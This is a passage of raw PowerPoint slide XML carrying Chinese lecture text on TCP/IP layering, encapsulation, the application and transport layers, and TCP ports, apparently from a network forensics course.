                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a: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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1403648" y="646902"/>
            <a:ext cx="6264696" cy="1706880"/>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当一个用户通过网络传输数据，数据就从最高层到中间层再到最底层，每一层都要增加额外信息。最底层通过物理网络发送这些累积的数据，数据在这一层传送到目的地。实质上，上层产生的数据会被它的下一层用更大的容器封装，即每一层封装上一层的数据，图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>显示了这种封装情形。本节下面的内容将进一步介绍这些层的细节，特别是与网络取证密切相关的一些特性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50178" name="Picture 2" descr="clip_image019"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2368580" y="2628017"/>
            <a:ext cx="3876675" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3599066" y="4342621"/>
            <a:ext cx="1415772" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议的封装</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="1"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6.2.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>应用层</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="1731243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a: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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1475656" y="1204089"/>
            <a:ext cx="6264696" cy="2661285"/>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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议的最高层，与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开放式系统互连参考模型的上三层的功能对应，实际上在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议的应用层中并没有独立定义表示层和会话层。这一层使得应用程序可以在服务器和客户端之间传输数据，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>浏览器之间传送数据。还有其他大量不同的应用层协议，包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、文件传输协议（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）、简单邮件传输协议（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SMTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）、简单网络管理协议（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SNMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）等，有些常用，有些不常用。不管使用何种协议，应用程序的数据都会产生并传递给传输层做进一步处理。</a:t>
            </a:r>
          </a:p>
          <a:p>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6.2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>传输层</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="1731243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a: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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1403648" y="1013416"/>
            <a:ext cx="6264696" cy="2985433"/>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sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>传输层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>参考模型的传输层相对应，提供一个应用程序到另一个应用程序之间端到端的通信。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议族在该层的协议主要有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议（传输控制协议）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议（用户数据报协议）等。传输层负责打包数据以便数据能在主机之间发送。这一层将应用层的数据封装，形成称为“数据包（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>packets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）”的逻辑单元（没有应用层数据也可以创建数据包，例如连接首先开始协商时）。每一个数据包包含一个包头（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>heads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>），其中包括说明使用的传输协议特点的各种域，数据包还可能有一个载荷（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>），其中含有应用层数据。</a:t>
            </a:r>
          </a:p>
          <a:p>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6.2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>传输层</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="1731243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a: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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1403648" y="736418"/>
            <a:ext cx="6264696" cy="3539430"/>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大多数网络应用程序依靠传输层确保数据的可靠传递，这就要通过使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议实现。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议在主机之间建立连接，并尽最大努力确保数据在此连接上可靠传递。每一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据包包含一个源端口和一个目标端口，一个源端口与系统上的一个服务相联系，另一个端口与另一个系统上的相应客户程序相联系。服务器系统通常为特定应用程序指定一个固定端口，而客户端系统一般为应用程序选择任何一个可用的端口。虽然一些程序通常选择某个特定端口（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务在端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务在端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>），但很多可以从任何一个端口运行，所以仅仅依靠端口号来决定网络通信数据属于哪一个应用程序的想法是不明智的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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6.2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>传输层</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="1731243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a: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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1403648" y="736418"/>
